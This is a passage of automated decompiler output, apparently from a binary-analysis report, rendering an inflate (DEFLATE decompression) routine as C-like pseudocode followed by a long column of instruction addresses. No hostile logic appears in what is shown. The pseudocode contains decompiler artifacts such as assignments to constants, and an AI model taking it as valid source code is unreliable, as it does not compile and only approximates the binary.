                                                                                      												goto L172;
                                                                                      											} else {
                                                                                      												goto L163;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											L173:
                                                                                      											__eflags = __ebx - 7;
                                                                                      											if(__ebx > 7) {
                                                                                      												__ebx = __ebx - 8;
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                      												_t380 = __ebp - 0x38;
                                                                                      												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                      												__eflags =  *_t380;
                                                                                      											}
                                                                                      											goto L175;
                                                                                      										case 8:
                                                                                      											L4:
                                                                                      											while(_t425 < 3) {
                                                                                      												if( *(_t448 - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												} else {
                                                                                      													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                      													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                      													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                      													_t425 = _t425 + 8;
                                                                                      													continue;
                                                                                      												}
                                                                                      											}
                                                                                      											_t425 = _t425 - 3;
                                                                                      											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                      											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                      											asm("sbb ecx, ecx");
                                                                                      											_t408 = _t406 >> 1;
                                                                                      											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                      											if(_t408 == 0) {
                                                                                      												L24:
                                                                                      												 *_t446 = 9;
                                                                                      												_t436 = _t425 & 0x00000007;
                                                                                      												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                      												_t425 = _t425 - _t436;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L6:
                                                                                      											_t411 = _t408 - 1;
                                                                                      											if(_t411 == 0) {
                                                                                      												L13:
                                                                                      												__eflags =  *0x432e90;
                                                                                      												if( *0x432e90 != 0) {
                                                                                      													L22:
                                                                                      													_t412 =  *0x40a5e8; // 0x9
                                                                                      													_t446[4] = _t412;
                                                                                      													_t413 =  *0x40a5ec; // 0x5
                                                                                      													_t446[4] = _t413;
                                                                                      													_t414 =  *0x431d0c; // 0x432610
                                                                                      													_t446[5] = _t414;
                                                                                      													_t415 =  *0x431d08; // 0x432e10
                                                                                      													_t446[6] = _t415;
                                                                                      													L23:
                                                                                      													 *_t446 =  *_t446 & 0x00000000;
                                                                                      													goto L180;
                                                                                      												} else {
                                                                                      													_t26 = _t448 - 8;
                                                                                      													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                      													__eflags =  *_t26;
                                                                                      													_t416 = 0x431d10;
                                                                                      													goto L15;
                                                                                      													L20:
                                                                                      													 *_t416 = _t438;
                                                                                      													_t416 = _t416 + 4;
                                                                                      													__eflags = _t416 - 0x432190;
                                                                                      													if(_t416 < 0x432190) {
                                                                                      														L15:
                                                                                      														__eflags = _t416 - 0x431f4c;
                                                                                      														_t438 = 8;
                                                                                      														if(_t416 > 0x431f4c) {
                                                                                      															__eflags = _t416 - 0x432110;
                                                                                      															if(_t416 >= 0x432110) {
                                                                                      																__eflags = _t416 - 0x432170;
                                                                                      																if(_t416 < 0x432170) {
                                                                                      																	_t438 = 7;
                                                                                      																}
                                                                                      															} else {
                                                                                      																_t438 = 9;
                                                                                      															}
                                                                                      														}
                                                                                      														goto L20;
                                                                                      													} else {
                                                                                      														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                                      														_push(0x1e);
                                                                                      														_pop(_t440);
                                                                                      														_push(5);
                                                                                      														_pop(_t419);
                                                                                      														memset(0x431d10, _t419, _t440 << 2);
                                                                                      														_t450 = _t450 + 0xc;
                                                                                      														_t442 = 0x431d10 + _t440;
                                                                                      														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                                      														 *0x432e90 =  *0x432e90 + 1;
                                                                                      														__eflags =  *0x432e90;
                                                                                      														goto L22;
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      											L7:
                                                                                      											_t423 = _t411 - 1;
                                                                                      											if(_t423 == 0) {
                                                                                      												 *_t446 = 0xb;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L8:
                                                                                      											if(_t423 != 1) {
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											goto L9;
                                                                                      										case 9:
                                                                                      											while(1) {
                                                                                      												L27:
                                                                                      												__eflags = __ebx - 0x20;
                                                                                      												if(__ebx >= 0x20) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L25:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L26:
                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__ecx = __ebx;
                                                                                      												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L28:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__ebx = 0;
                                                                                      											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                      											 *(__ebp - 0x40) = 0;
                                                                                      											__eflags = __eax;
                                                                                      											__esi[1] = __eax;
                                                                                      											if(__eax == 0) {
                                                                                      												goto L53;
                                                                                      											}
                                                                                      											L29:
                                                                                      											_push(0xa);
                                                                                      											_pop(__eax);
                                                                                      											goto L54;
                                                                                      										case 0xa:
                                                                                      											L30:
                                                                                      											__eflags =  *(__ebp - 0x34);
                                                                                      											if( *(__ebp - 0x34) == 0) {
                                                                                      												goto L182;
                                                                                      											}
                                                                                      											L31:
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												L48:
                                                                                      												__eflags = __eax -  *(__ebp - 0x34);
                                                                                      												if(__eax >=  *(__ebp - 0x34)) {
                                                                                      													__eax =  *(__ebp - 0x34);
                                                                                      												}
                                                                                      												__ecx = __esi[1];
                                                                                      												__eflags = __ecx - __eax;
                                                                                      												__edi = __ecx;
                                                                                      												if(__ecx >= __eax) {
                                                                                      													__edi = __eax;
                                                                                      												}
                                                                                      												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                      												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                      												_t80 =  &(__esi[1]);
                                                                                      												 *_t80 = __esi[1] - __edi;
                                                                                      												__eflags =  *_t80;
                                                                                      												if( *_t80 == 0) {
                                                                                      													L53:
                                                                                      													__eax = __esi[0x145];
                                                                                      													L54:
                                                                                      													 *__esi = __eax;
                                                                                      												}
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L32:
                                                                                      											__ecx = __esi[0x26e8];
                                                                                      											__edx =  *(__ebp - 0x30);
                                                                                      											__eflags = __edx - __ecx;
                                                                                      											if(__edx != __ecx) {
                                                                                      												L38:
                                                                                      												__esi[0x26ea] = __edx;
                                                                                      												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                      												__edx = __esi[0x26ea];
                                                                                      												__ecx = __esi[0x26e9];
                                                                                      												__eflags = __edx - __ecx;
                                                                                      												 *(__ebp - 0x30) = __edx;
                                                                                      												if(__edx >= __ecx) {
                                                                                      													__eax = __esi[0x26e8];
                                                                                      													__eax = __esi[0x26e8] - __edx;
                                                                                      													__eflags = __eax;
                                                                                      												} else {
                                                                                      													__ecx = __ecx - __edx;
                                                                                      													__eax = __ecx - __edx - 1;
                                                                                      												}
                                                                                      												__edi = __esi[0x26e8];
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												__eflags = __edx - __edi;
                                                                                      												if(__edx == __edi) {
                                                                                      													__edx =  &(__esi[0x6e8]);
                                                                                      													__eflags = __edx - __ecx;
                                                                                      													if(__eflags != 0) {
                                                                                      														 *(__ebp - 0x30) = __edx;
                                                                                      														if(__eflags >= 0) {
                                                                                      															__edi = __edi - __edx;
                                                                                      															__eflags = __edi;
                                                                                      															__eax = __edi;
                                                                                      														} else {
                                                                                      															__ecx = __ecx - __edx;
                                                                                      															__eax = __ecx;
                                                                                      														}
                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                      													}
                                                                                      												}
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													goto L183;
                                                                                      												} else {
                                                                                      													goto L48;
                                                                                      												}
                                                                                      											}
                                                                                      											L33:
                                                                                      											__eax = __esi[0x26e9];
                                                                                      											__edi =  &(__esi[0x6e8]);
                                                                                      											__eflags = __eax - __edi;
                                                                                      											if(__eax == __edi) {
                                                                                      												goto L38;
                                                                                      											}
                                                                                      											L34:
                                                                                      											__edx = __edi;
                                                                                      											__eflags = __edx - __eax;
                                                                                      											 *(__ebp - 0x30) = __edx;
                                                                                      											if(__edx >= __eax) {
                                                                                      												__ecx = __ecx - __edx;
                                                                                      												__eflags = __ecx;
                                                                                      												__eax = __ecx;
                                                                                      											} else {
                                                                                      												__eax = __eax - __edx;
                                                                                      												__eax = __eax - 1;
                                                                                      											}
                                                                                      											__eflags = __eax;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												goto L48;
                                                                                      											} else {
                                                                                      												goto L38;
                                                                                      											}
                                                                                      										case 0xb:
                                                                                      											goto L56;
                                                                                      										case 0xc:
                                                                                      											L60:
                                                                                      											__esi[1] = __esi[1] >> 0xa;
                                                                                      											__eax = (__esi[1] >> 0xa) + 4;
                                                                                      											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                      												goto L68;
                                                                                      											}
                                                                                      											goto L61;
                                                                                      										case 0xd:
                                                                                      											while(1) {
                                                                                      												L93:
                                                                                      												__eax = __esi[1];
                                                                                      												__ecx = __esi[2];
                                                                                      												__edx = __eax;
                                                                                      												__eax = __eax & 0x0000001f;
                                                                                      												__edx = __edx >> 5;
                                                                                      												__eax = __edx + __eax + 0x102;
                                                                                      												__eflags = __esi[2] - __eax;
                                                                                      												if(__esi[2] >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L73:
                                                                                      												__eax = __esi[0x143];
                                                                                      												while(1) {
                                                                                      													L76:
                                                                                      													__eflags = __ebx - __eax;
                                                                                      													if(__ebx >= __eax) {
                                                                                      														break;
                                                                                      													}
                                                                                      													L74:
                                                                                      													__eflags =  *(__ebp - 0x34);
                                                                                      													if( *(__ebp - 0x34) == 0) {
                                                                                      														goto L182;
                                                                                      													}
                                                                                      													L75:
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      													__ecx = __ebx;
                                                                                      													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      													__ebx = __ebx + 8;
                                                                                      													__eflags = __ebx;
                                                                                      												}
                                                                                      												L77:
                                                                                      												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                      												__eax = __eax &  *(__ebp - 0x40);
                                                                                      												__ecx = __esi[0x144];
                                                                                      												__eax = __esi[0x144] + __eax * 4;
                                                                                      												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                      												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                      												__eflags = __eax - 0x10;
                                                                                      												 *(__ebp - 0x14) = __eax;
                                                                                      												if(__eax >= 0x10) {
                                                                                      													L79:
                                                                                      													__eflags = __eax - 0x12;
                                                                                      													if(__eax != 0x12) {
                                                                                      														__eax = __eax + 0xfffffff2;
                                                                                      														 *(__ebp - 8) = 3;
                                                                                      													} else {
                                                                                      														_push(7);
                                                                                      														 *(__ebp - 8) = 0xb;
                                                                                      														_pop(__eax);
                                                                                      													}
                                                                                      													while(1) {
                                                                                      														L84:
                                                                                      														__ecx = __eax + __edx;
                                                                                      														__eflags = __ebx - __eax + __edx;
                                                                                      														if(__ebx >= __eax + __edx) {
                                                                                      															break;
                                                                                      														}
                                                                                      														L82:
                                                                                      														__eflags =  *(__ebp - 0x34);
                                                                                      														if( *(__ebp - 0x34) == 0) {
                                                                                      															goto L182;
                                                                                      														}
                                                                                      														L83:
                                                                                      														__ecx =  *(__ebp - 0x38);
                                                                                      														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      														__ecx = __ebx;
                                                                                      														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      														__ebx = __ebx + 8;
                                                                                      														__eflags = __ebx;
                                                                                      													}
                                                                                      													L85:
                                                                                      													__ecx = __edx;
                                                                                      													__ebx = __ebx - __edx;
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                      													__edx =  *(__ebp - 8);
                                                                                      													__ebx = __ebx - __eax;
                                                                                      													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                      													__ecx = __eax;
                                                                                      													__eax = __esi[1];
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      													__ecx = __esi[2];
                                                                                      													__eax = __eax >> 5;
                                                                                      													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                      													__eax = __eax & 0x0000001f;
                                                                                      													__eax = __edi + __eax + 0x102;
                                                                                      													__edi = __edx + __ecx;
                                                                                      													__eflags = __edx + __ecx - __eax;
                                                                                      													if(__edx + __ecx > __eax) {
                                                                                      														goto L9;
                                                                                      													}
                                                                                      													L86:
                                                                                      													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                      													if( *(__ebp - 0x14) != 0x10) {
                                                                                      														L89:
                                                                                      														__edi = 0;
                                                                                      														__eflags = 0;
                                                                                      														L90:
                                                                                      														__eax = __esi + 0xc + __ecx * 4;
                                                                                      														do {
                                                                                      															L91:
                                                                                      															 *__eax = __edi;
                                                                                      															__ecx = __ecx + 1;
                                                                                      															__eax = __eax + 4;
                                                                                      															__edx = __edx - 1;
                                                                                      															__eflags = __edx;
                                                                                      														} while (__edx != 0);
                                                                                      														__esi[2] = __ecx;
                                                                                      														continue;
                                                                                      													}
                                                                                      													L87:
                                                                                      													__eflags = __ecx - 1;
                                                                                      													if(__ecx < 1) {
                                                                                      														goto L9;
                                                                                      													}
                                                                                      													L88:
                                                                                      													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                      													goto L90;
                                                                                      												}
                                                                                      												L78:
                                                                                      												__ecx = __edx;
                                                                                      												__ebx = __ebx - __edx;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      												__ecx = __esi[2];
                                                                                      												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                      												__esi[2] = __esi[2] + 1;
                                                                                      											}
                                                                                      											L94:
                                                                                      											__eax = __esi[1];
                                                                                      											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                      											__edi = __eax;
                                                                                      											__eax = __eax >> 5;
                                                                                      											__edi = __edi & 0x0000001f;
                                                                                      											__ecx = 0x101;
                                                                                      											__eax = __eax & 0x0000001f;
                                                                                      											__edi = __edi + 0x101;
                                                                                      											__eax = __eax + 1;
                                                                                      											__edx = __ebp - 0xc;
                                                                                      											 *(__ebp - 0x14) = __eax;
                                                                                      											 &(__esi[0x148]) = __ebp - 4;
                                                                                      											 *(__ebp - 4) = 9;
                                                                                      											__ebp - 0x18 =  &(__esi[3]);
                                                                                      											 *(__ebp - 0x10) = 6;
                                                                                      											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                      											__eflags =  *(__ebp - 4);
                                                                                      											if( *(__ebp - 4) == 0) {
                                                                                      												__eax = __eax | 0xffffffff;
                                                                                      												__eflags = __eax;
                                                                                      											}
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												goto L9;
                                                                                      											} else {
                                                                                      												L97:
                                                                                      												__ebp - 0xc =  &(__esi[0x148]);
                                                                                      												__ebp - 0x10 = __ebp - 0x1c;
                                                                                      												__eax = __esi + 0xc + __edi * 4;
                                                                                      												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax != 0) {
                                                                                      													goto L9;
                                                                                      												}
                                                                                      												L98:
                                                                                      												__eax =  *(__ebp - 0x10);
                                                                                      												__eflags =  *(__ebp - 0x10);
                                                                                      												if( *(__ebp - 0x10) != 0) {
                                                                                      													L100:
                                                                                      													__cl =  *(__ebp - 4);
                                                                                      													 *__esi =  *__esi & 0x00000000;
                                                                                      													__eflags =  *__esi;
                                                                                      													__esi[4] = __al;
                                                                                      													__eax =  *(__ebp - 0x18);
                                                                                      													__esi[5] =  *(__ebp - 0x18);
                                                                                      													__eax =  *(__ebp - 0x1c);
                                                                                      													__esi[4] = __cl;
                                                                                      													__esi[6] =  *(__ebp - 0x1c);
                                                                                      													goto L101;
                                                                                      												}
                                                                                      												L99:
                                                                                      												__eflags = __edi - 0x101;
                                                                                      												if(__edi > 0x101) {
                                                                                      													goto L9;
                                                                                      												}
                                                                                      												goto L100;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											goto L9;
                                                                                      										case 0xf:
                                                                                      											L175:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                      											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                      											__ecx = __esi[0x26ea];
                                                                                      											__edx = __esi[0x26e9];
                                                                                      											__eflags = __ecx - __edx;
                                                                                      											 *(__ebp - 0x30) = __ecx;
                                                                                      											if(__ecx >= __edx) {
                                                                                      												__eax = __esi[0x26e8];
                                                                                      												__eax = __esi[0x26e8] - __ecx;
                                                                                      												__eflags = __eax;
                                                                                      											} else {
                                                                                      												__edx = __edx - __ecx;
                                                                                      												__eax = __edx - __ecx - 1;
                                                                                      											}
                                                                                      											__eflags = __ecx - __edx;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ecx != __edx) {
                                                                                      												L183:
                                                                                      												__edi = 0;
                                                                                      												goto L10;
                                                                                      											} else {
                                                                                      												L179:
                                                                                      												__eax = __esi[0x145];
                                                                                      												__eflags = __eax - 8;
                                                                                      												 *__esi = __eax;
                                                                                      												if(__eax != 8) {
                                                                                      													L184:
                                                                                      													0 = 1;
                                                                                      													goto L10;
                                                                                      												}
                                                                                      												goto L180;
                                                                                      											}
                                                                                      									}
                                                                                      								}
                                                                                      								L181:
                                                                                      								goto L9;
                                                                                      							}
                                                                                      							L70:
                                                                                      							if( *__edi == __eax) {
                                                                                      								goto L72;
                                                                                      							}
                                                                                      							L71:
                                                                                      							__esi[2] = __esi[2] & __eax;
                                                                                      							 *__esi = 0xd;
                                                                                      							goto L93;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				L182:
                                                                                      				_t443 = 0;
                                                                                      				_t446[0x147] =  *(_t448 - 0x40);
                                                                                      				_t446[0x146] = _t425;
                                                                                      				( *(_t448 + 8))[1] = 0;
                                                                                      				goto L11;
                                                                                      			}









                                                                                      0x004071a5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071ab
                                                                                      0x004071ab
                                                                                      0x004071d0
                                                                                      0x004071d0
                                                                                      0x004071d0
                                                                                      0x004071d2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071b0
                                                                                      0x004071b0
                                                                                      0x004071b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071ba
                                                                                      0x004071ba
                                                                                      0x004071bd
                                                                                      0x004071c0
                                                                                      0x004071c3
                                                                                      0x004071c5
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071cd
                                                                                      0x004071cd
                                                                                      0x004071d4
                                                                                      0x004071d4
                                                                                      0x004071dc
                                                                                      0x004071df
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x004071e9
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f4
                                                                                      0x0040720e
                                                                                      0x0040720e
                                                                                      0x00407211
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407217
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407221
                                                                                      0x00000000
                                                                                      0x00407221
                                                                                      0x004071f6
                                                                                      0x004071f9
                                                                                      0x00407200
                                                                                      0x00407203
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407229
                                                                                      0x00407229
                                                                                      0x0040724e
                                                                                      0x0040724e
                                                                                      0x0040724e
                                                                                      0x00407250
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407238
                                                                                      0x00407238
                                                                                      0x0040723b
                                                                                      0x0040723e
                                                                                      0x00407241
                                                                                      0x00407243
                                                                                      0x00407245
                                                                                      0x00407248
                                                                                      0x0040724b
                                                                                      0x0040724b
                                                                                      0x0040724b
                                                                                      0x00407252
                                                                                      0x0040725a
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407262
                                                                                      0x00407265
                                                                                      0x00407265
                                                                                      0x00407267
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407270
                                                                                      0x00407275
                                                                                      0x00407277
                                                                                      0x0040727d
                                                                                      0x0040727f
                                                                                      0x00407294
                                                                                      0x00407296
                                                                                      0x00407296
                                                                                      0x00407281
                                                                                      0x00407287
                                                                                      0x00407289
                                                                                      0x0040728b
                                                                                      0x0040728b
                                                                                      0x00407298
                                                                                      0x0040729c
                                                                                      0x0040729f
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072aa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072b0
                                                                                      0x004072b0
                                                                                      0x004072b6
                                                                                      0x004072b8
                                                                                      0x004072dd
                                                                                      0x004072e0
                                                                                      0x004072e6
                                                                                      0x004072eb
                                                                                      0x004072f1
                                                                                      0x004072f7
                                                                                      0x004072f9
                                                                                      0x004072fc
                                                                                      0x00407305
                                                                                      0x0040730b
                                                                                      0x0040730b
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407302
                                                                                      0x0040730d
                                                                                      0x00407313
                                                                                      0x00407315
                                                                                      0x00407318
                                                                                      0x0040731a
                                                                                      0x00407320
                                                                                      0x00407322
                                                                                      0x00407324
                                                                                      0x00407326
                                                                                      0x00407328
                                                                                      0x0040732b
                                                                                      0x00407334
                                                                                      0x00407337
                                                                                      0x00407337
                                                                                      0x0040732d
                                                                                      0x0040732d
                                                                                      0x00407330
                                                                                      0x00407330
                                                                                      0x0040732b
                                                                                      0x00407322
                                                                                      0x00407339
                                                                                      0x0040733b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040733b
                                                                                      0x004072ba
                                                                                      0x004072ba
                                                                                      0x004072c0
                                                                                      0x004072c6
                                                                                      0x004072c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072cc
                                                                                      0x004072ce
                                                                                      0x004072d7
                                                                                      0x004072d7
                                                                                      0x004072d0
                                                                                      0x004072d0
                                                                                      0x004072d3
                                                                                      0x004072d3
                                                                                      0x004072d9
                                                                                      0x004072db
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407341
                                                                                      0x00407341
                                                                                      0x00407346
                                                                                      0x00407348
                                                                                      0x00407349
                                                                                      0x0040734a
                                                                                      0x0040734b
                                                                                      0x00407351
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735c
                                                                                      0x00407362
                                                                                      0x00407362
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x0040736e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407373
                                                                                      0x00407373
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737b
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407415
                                                                                      0x00407417
                                                                                      0x00407418
                                                                                      0x00407419
                                                                                      0x0040741c
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x00407381
                                                                                      0x00407381
                                                                                      0x00407387
                                                                                      0x00407389
                                                                                      0x004073ae
                                                                                      0x004073b1
                                                                                      0x004073b7
                                                                                      0x004073bc
                                                                                      0x004073c2
                                                                                      0x004073c8
                                                                                      0x004073ca
                                                                                      0x004073cd
                                                                                      0x004073d6
                                                                                      0x004073dc
                                                                                      0x004073dc
                                                                                      0x004073cf
                                                                                      0x004073d1
                                                                                      0x004073d3
                                                                                      0x004073d3
                                                                                      0x004073de
                                                                                      0x004073e4
                                                                                      0x004073e6
                                                                                      0x004073e9
                                                                                      0x004073eb
                                                                                      0x004073f1
                                                                                      0x004073f3
                                                                                      0x004073f5
                                                                                      0x004073f7
                                                                                      0x004073f9
                                                                                      0x004073fc
                                                                                      0x00407405
                                                                                      0x00407408
                                                                                      0x00407408
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407401
                                                                                      0x00407401
                                                                                      0x004073fc
                                                                                      0x004073f3
                                                                                      0x0040740a
                                                                                      0x0040740c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040740c
                                                                                      0x0040738b
                                                                                      0x0040738b
                                                                                      0x00407391
                                                                                      0x00407397
                                                                                      0x00407399
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739d
                                                                                      0x0040739f
                                                                                      0x004073a6
                                                                                      0x004073a6
                                                                                      0x004073a8
                                                                                      0x004073a1
                                                                                      0x004073a1
                                                                                      0x004073a3
                                                                                      0x004073a3
                                                                                      0x004073aa
                                                                                      0x004073ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fbb
                                                                                      0x00406fbb
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fbe
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00000000
                                                                                      0x00406fc4
                                                                                      0x00406fa6
                                                                                      0x00406fa6
                                                                                      0x00406fa9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406faf
                                                                                      0x00406faf
                                                                                      0x00000000
                                                                                      0x00406faf
                                                                                      0x00406f05
                                                                                      0x00406f05
                                                                                      0x00406f07
                                                                                      0x00406f09
                                                                                      0x00406f0c
                                                                                      0x00406f0f
                                                                                      0x00406f13
                                                                                      0x00406f13
                                                                                      0x00406fe7
                                                                                      0x00406fe7
                                                                                      0x00406fea
                                                                                      0x00406ff1
                                                                                      0x00406ff5
                                                                                      0x00406ff7
                                                                                      0x00406ffa
                                                                                      0x00406ffd
                                                                                      0x00407002
                                                                                      0x00407005
                                                                                      0x00407007
                                                                                      0x00407008
                                                                                      0x0040700b
                                                                                      0x00407016
                                                                                      0x00407019
                                                                                      0x00407030
                                                                                      0x00407035
                                                                                      0x0040703c
                                                                                      0x00407041
                                                                                      0x00407045
                                                                                      0x00407047
                                                                                      0x00407047
                                                                                      0x00407047
                                                                                      0x0040704a
                                                                                      0x0040704c
                                                                                      0x00000000
                                                                                      0x00407052
                                                                                      0x00407052
                                                                                      0x00407056
                                                                                      0x00407061
                                                                                      0x00407074
                                                                                      0x00407079
                                                                                      0x0040707e
                                                                                      0x00407080
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407086
